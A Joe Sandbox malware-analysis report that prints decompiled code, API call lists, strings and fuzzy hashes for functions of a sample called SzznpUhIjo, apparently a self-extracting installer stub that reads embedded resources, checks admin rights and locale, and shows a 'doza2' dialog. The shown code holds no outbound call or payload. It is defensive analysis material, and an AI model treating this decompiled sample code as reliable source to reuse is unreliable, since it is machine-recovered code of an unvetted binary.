Part of subcall function 004017EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
Part of subcall function 004017EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
Part of subcall function 004017EE: AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
Part of subcall function 004017EE: FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
Part of subcall function 004017EE: FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A

GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 004018EB
OpenProcessToken.ADVAPI32(00000000), ref: 004018F2
GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0040190A
GetLastError.KERNEL32 ref: 00401918
LocalAlloc.KERNEL32(00000000,?,?), ref: 0040192C
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00401944
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401964
EqualSid.ADVAPI32(00000004,?), ref: 0040197A
FreeSid.ADVAPI32(?), ref: 0040199C
LocalFree.KERNEL32(00000000), ref: 004019A3
CloseHandle.KERNEL32(?), ref: 004019AD

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
Instruction ID: 25d17cb087145c015d5063b66ab4b84c81c4c11853c483eeef0c9c8ad6c8a379
Opcode Fuzzy Hash: 301c52f797cbd35a8e8b94abf9be9750f60c30641f2852762fecb15bbadc3fda
Instruction Fuzzy Hash: 2F312DB1A00209AFDB109FA5DD98AAFBBBCFF48704F50043AE545F61A0D7389915CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}

0x00404699
0x0040469b
0x004046a9
0x004046af
0x004046b4
0x004046bc
0x004046f9
0x00000000
0x004046f9
0x004046d9
0x004046dd
0x00000000
0x00000000
0x004046e5
0x004046ef
0x00000000
0x004046f5
0x004046ff

APIs

FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
memcpy_s.MSVCRT ref: 004046E5
FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF

Strings

TITLE, xrefs: 0040469D, 004046C0
doza2, xrefs: 004046E4

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
String ID: TITLE$doza2
API String ID: 3370778649-4167907646
Opcode ID: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
Instruction ID: 79f0873ee19441588a253031faa3d29a4edaeb9cce06827ffb284520bab3e3ef
Opcode Fuzzy Hash: 735a035723e9c89e979ff7554535d7cc5c2412197345818d6819b7f6aae81ff3
Instruction Fuzzy Hash: B801F9722403047BE3101BA59D0CF2B3E2CDBC6F51F044435FB49B7280D9B6886192BE

Uniqueness

Uniqueness Score: -1.00%

Function 0040681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x408004; // 0xee8c6708
				_v8 = _t19 ^ _t44;
				_t41 =  *0x4081d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x4081d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x4081d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x401140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E004066F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x4081d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x40463b
				return E00406CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}

0x0040681f
0x0040682a
0x00406831
0x00406836
0x0040683c
0x0040683e
0x00406848
0x00406851
0x0040685d
0x00406864
0x00406876
0x0040693a
0x0040693a
0x0040687c
0x0040687e
0x00406885
0x00000000
0x004068d6
0x004068f4
0x00406900
0x00406902
0x0040690a
0x00000000
0x0040690c
0x0040690c
0x0040691c
0x00000000
0x0040691e
0x00406924
0x0040692b
0x00406932
0x00000000
0x00000000
0x00000000
0x0040692b
0x0040691c
0x0040690a
0x00406885
0x00406876
0x00406940
0x00406951

APIs

GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040686E
GetSystemMetrics.USER32(0000004A), ref: 004068A7
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 004068CC
RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068F4
RegCloseKey.ADVAPI32(?), ref: 00406902

Part of subcall function 004066F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0040691A), ref: 00406741

Strings

;F@, xrefs: 00406940
Control Panel\Desktop\ResourceLocale, xrefs: 004068C2

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: ;F@$Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-4093955092
Opcode ID: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
Instruction ID: e57de408b3f85bc4f8b92cc567276c2474f6d04b58f3ec5ba2619b9cb5330980
Opcode Fuzzy Hash: 34cef6a5a546b334fac7b65d37dafabe7fca2f16954090be01d47ee25951021f
Instruction Fuzzy Hash: 14318471A003289FDB21CF15CD44BAB7778EF45718F0101BAE98AB6290DB349D95CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t7;
				void* _t11;
				struct HWND__* _t12;
				int _t22;
				struct HWND__* _t24;

				_t7 = _a8 - 0x10;
				if(_t7 == 0) {
					EndDialog(_a4, 2);
					L11:
					return 1;
				}
				_t11 = _t7 - 0x100;
				if(_t11 == 0) {
					_t12 = GetDesktopWindow();
					_t24 = _a4;
					E004043D0(_t24, _t12);
					SetWindowTextA(_t24, "doza2");
					SetDlgItemTextA(_t24, 0x838,  *0x409404);
					SetForegroundWindow(_t24);
					goto L11;
				}
				if(_t11 == 1) {
					_t22 = _a12;
					if(_t22 < 6) {
						goto L11;
					}
					if(_t22 <= 7) {
						L8:
						EndDialog(_a4, _t22);
						return 1;
					}
					if(_t22 != 0x839) {
						goto L11;
					}
					 *0x4091dc = 1;
					goto L8;
				}
				return 0;
			}

0x00403459
0x0040345c
0x004034d8
0x004034de
0x00000000
0x004034e0
0x0040345e
0x00403463
0x0040349a
0x004034a0
0x004034a7
0x004034b2
0x004034c4
0x004034cb
0x00000000
0x004034cb
0x00403468
0x0040346e
0x00403474
0x00000000
0x00000000
0x0040347c
0x0040348c
0x00403490
0x00000000
0x00403496
0x00403484
0x00000000
0x00000000
0x00403486
0x00000000
0x00403486
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00403490
GetDesktopWindow.USER32 ref: 0040349A
SetWindowTextA.USER32(?,doza2), ref: 004034B2
SetDlgItemTextA.USER32(?,00000838), ref: 004034C4
SetForegroundWindow.USER32(?), ref: 004034CB
EndDialog.USER32(?,00000002), ref: 004034D8

Strings

doza2, xrefs: 004034AC

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Window$DialogText$DesktopForegroundItem
String ID: doza2
API String ID: 852535152-612509477
Opcode ID: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
Instruction ID: 9f86eaeb99706c3d809457defbd2d1e2bf9a223c622526840d8ada4286a6712c
Opcode Fuzzy Hash: d838905dce34ad587255487376907b35c9843f6154121b09490ee186a64799e7
Instruction Fuzzy Hash: 4601B131240214ABD7165F65DE0C96E3E68EB49702F104036FA46BE6E1CB789F52DB8E

Uniqueness

Uniqueness Score: -1.00%

Function 00402AAC Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00402AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				char _t32;
				intOrPtr _t34;
				char* _t38;
				char _t42;
				char* _t44;
				CHAR* _t52;
				intOrPtr* _t55;
				CHAR* _t59;
				void* _t62;
				CHAR* _t64;
				CHAR* _t65;
				signed int _t66;

				_t60 = __edx;
				_t16 =  *0x408004; // 0xee8c6708
				_t17 = _t16 ^ _t66;
				_v8 = _t16 ^ _t66;
				_t65 = _a4;
				_t44 = __edx;
				_t64 = __ecx;
				if( *((char*)(__ecx)) != 0) {
					GetModuleFileNameA( *0x409a3c,  &_v268, 0x104);
					while(1) {
						_t17 =  *_t64;
						if(_t17 == 0) {
							break;
						}
						_t21 = IsDBCSLeadByte(_t17);
						 *_t65 =  *_t64;
						if(_t21 != 0) {
							_t65[1] = _t64[1];
						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E004065E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00401680(_t65, E004017C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00406CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}

0x00402aac
0x00402ab7
0x00402abc
0x00402abe
0x00402ac3
0x00402ac6
0x00402ac9
0x00402ace
0x00402ae6
0x00402bdc
0x00402bdc
0x00402be0
0x00000000
0x00000000
0x00402af2
0x00402afc
0x00402b00
0x00402b05
0x00402b05
0x00402b0b
0x00402bca
0x00402bd1
0x00402b11
0x00402b18
0x00402b26
0x00402b99
0x00402bc8
0x00000000
0x00000000
0x00402b9b
0x00402bae
0x00402bb3
0x00402bb5
0x00402bb5
0x00402bb8
0x00402bb8
0x00402bba
0x00402bbb
0x00000000
0x00402bb8
0x00402b28
0x00402b2e
0x00402b33
0x00402b39
0x00402b3c
0x00402b3c
0x00402b3e
0x00402b3f
0x00402b55
0x00402b5d
0x00402b64
0x00402b64
0x00402b7a
0x00402b7f
0x00402b81
0x00402b81
0x00402b84
0x00402b84
0x00402b86
0x00402b87
0x00402bbf
0x00402bc1
0x00402bc1
0x00402b26
0x00402bda
0x00402bda
0x00402be6
0x00402be6
0x00402bf8

APIs

GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00402AE6
IsDBCSLeadByte.KERNEL32(00000000), ref: 00402AF2
CharNextA.USER32(?), ref: 00402B12
CharUpperA.USER32 ref: 00402B1E
CharPrevA.USER32(?,?), ref: 00402B55
CharNextA.USER32(?), ref: 00402BD4

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
String ID:
API String ID: 571164536-0
Opcode ID: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
Instruction ID: 708e6bc04abe071344f259b5c123e55e43d0c35eeaa9831848c96a395a22173b
Opcode Fuzzy Hash: 9ef7d4785946137a81a6c4d03daffc9e4a49267f720d8b09bbae1a799264634a
Instruction Fuzzy Hash: 144102345042855FDB159F308D08ABE7BB99F56304F1400BBE8C2A72C2DAB95E46CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004028E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00402773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t11 =  &_v32; // 0x403938
						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									_t16 =  &_v32; // 0x403938
									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00402A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x004028f1
0x004028f4
0x004028f7
0x004028f9
0x004028fc
0x004028ff
0x00402901
0x00402907
0x00402a62
0x00402a64
0x0040290d
0x0040290d
0x0040290f
0x00402912
0x00402920
0x00402937
0x00000000
0x00000000
0x0040293d
0x00402944
0x0040294a
0x0040294f
0x00402a2f
0x00402a32
0x00402a34
0x00402a37
0x00402a41
0x00000000
0x00000000
0x00402955
0x0040295e
0x00402962
0x00402969
0x0040296f
0x00402974
0x0040297e
0x0040298c
0x00402a20
0x00402a21
0x00402a27
0x00402a4c
0x00402a4f
0x00402a50
0x00402a53
0x00402a56
0x00402a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x004029b2
0x004029b2
0x004029b5
0x004029bd
0x004029c3
0x004029cc
0x004029d5
0x004029d7
0x004029da
0x004029dd
0x004029df
0x004029ec
0x004029f8
0x004029fc
0x004029ff
0x00402a02
0x00402a07
0x00402a0a
0x00402a0f
0x00402a19
0x00402a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00402a0f
0x0040298c
0x00402974
0x00402962
0x00000000
0x0040294f
0x00402912
0x00402a65
0x00402a68
0x00402a6c
0x00402a6f
0x00402a6f
0x00402a7d

APIs

GlobalFree.KERNEL32 ref: 00402A6F

Part of subcall function 00402773: CharUpperA.USER32(EE8C6708,00000000,00000000,00000000), ref: 004027A8
Part of subcall function 00402773: CharNextA.USER32(0000054D), ref: 004027B5
Part of subcall function 00402773: CharNextA.USER32(00000000), ref: 004027BC
Part of subcall function 00402773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402829
Part of subcall function 00402773: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402852
Part of subcall function 00402773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00402870
Part of subcall function 00402773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 004028A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005), ref: 00402958
GlobalLock.KERNEL32 ref: 00402969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00403938,?,?,?,?,-00000005,?), ref: 00402A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00403938,?,?), ref: 00402A81

Strings

89@, xrefs: 0040293D, 0040297E, 00402940

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID: 89@
API String ID: 3949799724-2908856592
Opcode ID: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
Instruction ID: 44ac0b4ed5788b328005fe1e31761a07754ab552c57995065579413dcf6dc051
Opcode Fuzzy Hash: 2b24d5433026d87cd8067df8aac39d6b4553280ec6bde926f4b9e96b3cf03a94
Instruction Fuzzy Hash: 61511A31E00219DBCB21DFA9C988AAEB7B5FF48704F14407AE901B3391DB759A41DF99

Uniqueness

Uniqueness Score: -1.00%

Function 004043D0 Relevance: 10.6, APIs: 7, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004043D0(struct HWND__* __ecx, struct HWND__* __edx) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				void* _t53;
				intOrPtr _t56;
				int _t59;
				struct HWND__* _t63;
				struct HWND__* _t67;
				struct HWND__* _t68;
				struct HDC__* _t69;
				int _t72;
				signed int _t74;

				_t63 = __edx;
				_t29 =  *0x408004; // 0xee8c6708
				_v8 = _t29 ^ _t74;
				_t68 = __edx;
				_v44 = __ecx;
				GetWindowRect(__ecx,  &_v40);
				_t53 = _v40.bottom - _v40.top;
				_v48 = _v40.right - _v40.left;
				GetWindowRect(_t68,  &_v24);
				_v56 = _v24.bottom - _v24.top;
				_t69 = GetDC(_v44);
				_v52 = GetDeviceCaps(_t69, 8);
				_v60 = GetDeviceCaps(_t69, 0xa);
				ReleaseDC(_v44, _t69);
				_t56 = _v48;
				asm("cdq");
				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
				_t67 = 0;
				if(_t72 >= 0) {
					_t63 = _v52;
					if(_t72 + _t56 > _t63) {
						_t72 = _t63 - _t56;
					}
				} else {
					_t72 = _t67;
				}
				asm("cdq");
				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
				if(_t59 >= 0) {
					_t63 = _v60;
					if(_t59 + _t53 > _t63) {
						_t59 = _t63 - _t53;
					}
				} else {
					_t59 = _t67;
				}
				return E00406CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
			}

0x004043d0
0x004043d8
0x004043df
0x004043e6
0x004043ec
0x004043f1
0x00404400
0x00404403
0x0040440b
0x00404420
0x00404429
0x00404437
0x00404444
0x00404447
0x0040444d
0x00404454
0x0040445b
0x00404460
0x00404461
0x00404467
0x0040446f
0x00404473
0x00404473
0x00404463
0x00404463
0x00404463
0x0040447a
0x00404481
0x00404484
0x0040448a
0x00404492
0x00404496
0x00404496
0x00404486
0x00404486
0x00404486
0x004044b8

APIs

GetWindowRect.USER32(?,?), ref: 004043F1
GetWindowRect.USER32(00000000,?), ref: 0040440B
GetDC.USER32(?), ref: 00404423
GetDeviceCaps.GDI32(00000000,00000008), ref: 0040442E
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040443A
ReleaseDC.USER32(?,00000000), ref: 00404447
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 004044A2

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Window$CapsDeviceRect$Release
String ID:
API String ID: 2212493051-0
Opcode ID: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
Instruction ID: 70268ef729a394680d9897d7bab053961038611fd3359a441dc99da7ee3ef4ca
Opcode Fuzzy Hash: 53cb3f9c8d94e0ba8da14288bef56b7f65c9e83190bda8a924e586b622268b32
Instruction Fuzzy Hash: FA315E72E00219AFCB14CFB8DE889EEBBB5EB89310F154179F905F7280DA346C058B65

Uniqueness

Uniqueness Score: -1.00%

Function 00406298 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00406298(intOrPtr __ecx, intOrPtr* __edx) {
				signed int _v8;
				char _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t16;
				struct HRSRC__* _t21;
				intOrPtr _t26;
				void* _t30;
				struct HINSTANCE__* _t36;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr* _t44;
				intOrPtr* _t45;
				void* _t47;
				signed int _t50;
				struct HINSTANCE__* _t51;

				_t44 = __edx;
				_t16 =  *0x408004; // 0xee8c6708
				_v8 = _t16 ^ _t50;
				_t46 = 0;
				_v32 = __ecx;
				_v36 = 0;
				_t36 = 1;
				E0040171E( &_v28, 0x14, "UPDFILE%lu", 0);
				while(1) {
					_t51 = _t51 + 0x10;
					_t21 = FindResourceA(_t46,  &_v28, 0xa);
					if(_t21 == 0) {
						break;
					}
					_t45 = LockResource(LoadResource(_t46, _t21));
					if(_t45 == 0) {
						 *0x409124 = 0x80070714;
						_t36 = _t46;
					} else {
						_t5 = _t45 + 8; // 0x8
						_t44 = _t5;
						_t40 = _t44;
						_t6 = _t40 + 1; // 0x9
						_t47 = _t6;
						do {
							_t26 =  *_t40;
							_t40 = _t40 + 1;
						} while (_t26 != 0);
						_t41 = _t40 - _t47;
						_t46 = _t51;
						_t7 = _t41 + 1; // 0xa
						 *0x40a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
						_t30 = _v32();
						if(_t51 != _t51) {
							asm("int 0x29");
						}
						_push(_t45);
						if(_t30 == 0) {
							_t36 = 0;
							FreeResource(??);
						} else {
							FreeResource();
							_v36 = _v36 + 1;
							E0040171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
							_t46 = 0;
							continue;
						}
					}
					L12:
					return E00406CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
				}
				goto L12;
			}

0x00406298
0x004062a0
0x004062a7
0x004062ad
0x004062af
0x004062bb
0x004062c3
0x004062c4
0x0040633b
0x0040633b
0x00406345
0x0040634d
0x00000000
0x00000000
0x004062da
0x004062de
0x0040635f
0x00406369
0x004062e0
0x004062e0
0x004062e0
0x004062e3
0x004062e5
0x004062e5
0x004062e8
0x004062e8
0x004062ea
0x004062eb
0x004062ef
0x004062f1
0x004062f3
0x00406302
0x00406308
0x0040630d
0x00406314
0x00406314
0x00406316
0x00406319
0x00406355
0x00406357
0x0040631b
0x0040631b
0x00406331
0x00406334
0x00406339
0x00000000
0x00406339
0x00406319
0x0040636b
0x0040637d
0x0040637d
0x00000000

APIs

Part of subcall function 0040171E: _vsnprintf.MSVCRT ref: 00401750

